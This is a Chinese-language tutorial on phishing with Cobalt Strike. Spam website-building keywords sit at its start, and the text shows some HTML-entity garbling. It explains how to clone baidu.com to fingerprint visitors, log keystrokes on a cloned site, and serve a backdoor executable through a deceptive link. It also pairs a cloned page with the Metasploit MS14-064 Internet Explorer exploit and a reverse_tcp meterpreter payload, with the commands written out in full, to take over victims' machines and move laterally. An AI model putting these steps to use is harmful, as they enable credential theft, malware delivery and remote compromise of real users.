国税网站页面建设中,青岛谁家做网站,制作一个自己的网站,品牌网站建设堅持大蝌蚪一、环境
自行搭建#xff0c;kill#xff0c;Windows10#xff0c;cs
二、原理
如图所示 三、钓鱼演示
首先第一步#xff1a;打开System Profiler-分析器功能 选择克隆www.baidu.com页面做钓鱼 之后我们通过包装域名#xff0c;各种手段让攻击对象访问#xff1a;h…一、环境
自行搭建killWindows10cs
二、原理
如图所示 三、钓鱼演示
首先第一步打开System Profiler-分析器功能 选择克隆www.baidu.com页面做钓鱼 之后我们通过包装域名各种手段让攻击对象访问http:kill的ip/baidu 之后会自动跳转到百度 可看到选择应用信息后钓到了用户用的系统以及浏览器版本型号…这里别小看两个信息思路是该模块可以修改利用溢出代码等形式提权或者获得更多的信息收集…下面我会写一些演示 3.1 克隆模块和克隆网站进行键盘记录攻击
打开克隆网站模块 克隆键盘记录 这里克隆网站可以是http和https的URL…克隆到192.168.2.153:801链接上 勾选Log Keystrokes on cloned site后记录键盘操作
点击web log等待 等对方在克隆网站上进行操作后 我们这边直接监听 可看到记录了对方输入键盘的信息
3.2克隆网站下载执行木马
打开Host File 克隆一个页面并提供一个后门文件 file选择CS生成的shell或者MSF也行 确定URL下载的地址端口链接等情况
木马做好放里面 生成http://192.168.131.129:801/download/file.exe恶意链接
制作钓鱼网页 访问钓鱼网页
可看到ie访问该页面下载了file.exe生成的CS后门文件… 这里ie带有web安全下载防御功能这种思路是两个模块配合完成的其中可以修改图标、文件名、弄个免杀、换个欺骗链接很好钓鱼 点击软件木马上线 3.3 Metasploit溢出代码与Cobalt Strik配合钓鱼重点
本次演示的是思路拿的是一个针对XP或者以下系统利用MS14_064利用IE执行远控木马…记住是思路 use exploit/windows/browser/ms14_064_ole_code_execution set srvhost 192.168.2.153 set SRVPORT 6666 set payload windows/meterpreter/reverse_tcp set lhost 192.168.2.153 exploit 这里很简答MSF执行即可~ http://192.168.2.153:6666/Sixcra获得恶意链接 很简单利用和方法3一样打开克隆网站模块放入Attack即可 这里就不勾选键盘记录了因为直接能控制对方了 生成URLhttp://192.168.2.153:80/baidu 可看到当对方访问做好的http://192.168.2.153:80/baidu钓鱼页面后直接跳转到了百度…
但是通过溢出漏洞在攻击端获得了对方的控制shell… 通过控制继续横向渗透即可